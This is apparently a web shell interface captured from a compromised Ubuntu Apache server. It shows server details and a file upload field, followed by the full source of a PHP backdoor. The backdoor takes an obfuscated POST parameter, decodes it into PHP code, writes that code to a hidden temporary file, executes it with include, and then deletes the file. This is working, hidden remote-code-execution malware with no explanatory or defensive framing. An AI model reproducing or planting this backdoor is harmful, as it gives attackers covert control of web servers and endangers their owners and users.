| Server IP : 46.62.235.243 / Your IP : 216.73.216.217 Web Server : Apache/2.4.58 (Ubuntu) System : Linux Linkabili3Dicembre 6.8.0-100-generic #100-Ubuntu SMP PREEMPT_DYNAMIC Tue Jan 13 16:40:06 UTC 2026 x86_64 User : www-data ( 33) PHP Version : 8.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/linkabili/public/js/ |
Upload File : |
<?php
if(isset($_POST["\x64a\x74"]) ? true : false){
$ent = array_filter([getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/dev/shm", session_save_path(), getenv("TMP"), sys_get_temp_dir(), getcwd(), "/var/tmp"]);
$itm = $_POST["\x64a\x74"];
$itm= explode ( '.' , $itm ) ;
$k = '';
$s5 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$lenS = strlen($s5);
$n = 0;
while ($n <count($itm)) {
$v4 = $itm[$n];
$sChar = ord($s5[$n % $lenS]);
$d = ((int)$v4 - $sChar - ($n % 10)) ^ 38;
$k .= chr($d);
$n++;
}
foreach ($ent as $value) {
if (is_writable($value) && is_dir($value)) {
$entry = str_replace("{var_dir}", $value, "{var_dir}/.holder");
$success = file_put_contents($entry, $k);
if ($success) {
include $entry;
@unlink($entry);
die();}
}
}
}